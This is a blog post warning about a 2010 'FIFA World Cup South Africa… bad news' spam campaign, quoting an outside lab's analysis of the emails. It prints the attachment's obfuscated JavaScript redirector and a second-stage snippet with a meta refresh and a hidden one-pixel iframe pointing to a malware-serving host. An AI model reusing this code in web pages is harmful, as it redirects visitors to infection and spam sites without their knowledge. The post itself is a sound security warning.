FIFA World Cup South Africa… bad news

I received dozens of emails this morning, hailing from different names, like, Carla Browning, Royce Rubio, Blanca Little, Estelle Goldsmith, Allan Mayo, etc, etc - all with the subject line, FIFA World Cup South Africa… bad news.

The email reads

Hello!!
FIFA World Cup 2010 scandal news, read attached document.

If you receive a FIFA World Cup bad News email, or dozens of them as I did, just bin them, they are obvious spam and they want you to click on the link for some nefarious purpose.

Shift and delete!

Update 12/06/2010

The excellent MX Lab Blog looked into the email a wee bit deeper - their findings:

MX Lab intercepted a few samples of emails with the subject “FIFA World Cup South Africa… bad news”.

The from email address is spoofed and this is the body of the email:

Hello!!

FIFA World Cup 2010 scandal news, read attached document

Attached is the file news.html or open.html that contains a malicious javascript:

<script type=’text/javascript’>

function dX(){};

var h=new Date();

dX.prototype = {

f : function() {

var u=function(){};

var uY=new Date();

var o=””;

var k=document;

var oE=function(){};

var l=”;

this.i=33457;

var kV=k[’l.oSc<a(t<i_oSnS’.replace(/[S_\<\(\.]/g, ”)];

var w=function(){};

var p=false;

this.pP=false;

this.s=”;

kV[’hGrGe>f>’.replace(/[\>mYGw]/g, ”)]=’hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/
2xJnSuJ4JeSjS/2z2.ShltlmJ’.replace(/[JS2\>l]/g, ”);

var iK=”iK”;

pK=”;

this.d=”d”;

uM=””;

}

};

this.dK=””;

var fG=new dX();

var dR=”dR”;

fG.f();

hJ=false;

</script>

This Javascript will redirect your browser to hxxp://advancedwoodtech.com/xnu4ej/z.htm.

At the moment, the web site page mentioned here is not active, we got a 404 error when visiting, so we can’t investigate this further. But we are pretty sure that you will download some malware with an attempt to infect your computer and get redirected to a spam web site of the Canadian Pharmacy.

The FIFA Wrld Cup South Africa bad news email has all the characteristics of previous campaigns where social media is being used to lure visitors to a web site and get their computer infected.

Our recommendation is: when you receive this type of spam email, do not open the attached HTML file and delete the email.

[UPDATE]

MX Lab intercepted a new version of this social engineering attack and the email now contains the file open.html.

This leads to the web site hxxp://shoppingbazzar.co.uk/z.htm. The online document z.html contains the following code:

<meta http-equiv=“refresh” content=“3;url=hxxp://toldspeak.com/” />
<iframe src=’hxxp://hugefrogs.ru:8080/index.php?pid=10′ width=‘1′ height=‘1′ style=‘visibility: hidden;’></iframe>

This will redirect your browser to hxxp://toldspeak.com after 3 seconds that contains the Canadian Pharmacy web site as mentioned earlier.

The site hxxp://hugefrogs.ru:8080/index.php?pid=10 contains more obfuscated JavaScript that creates an iframe to a PDF file and to a Java .jar file. With one of these files an attack is being executed to the computer.

Good info chaps!

Leave a Reply





SEO Blog

SEO Blog

The Big Man's SEO blog is primarily aimed at website owners looking for ethical SEO tips, optimisation advice and who are interested in reading articles and opinions related to search engines, the internet, technology and software.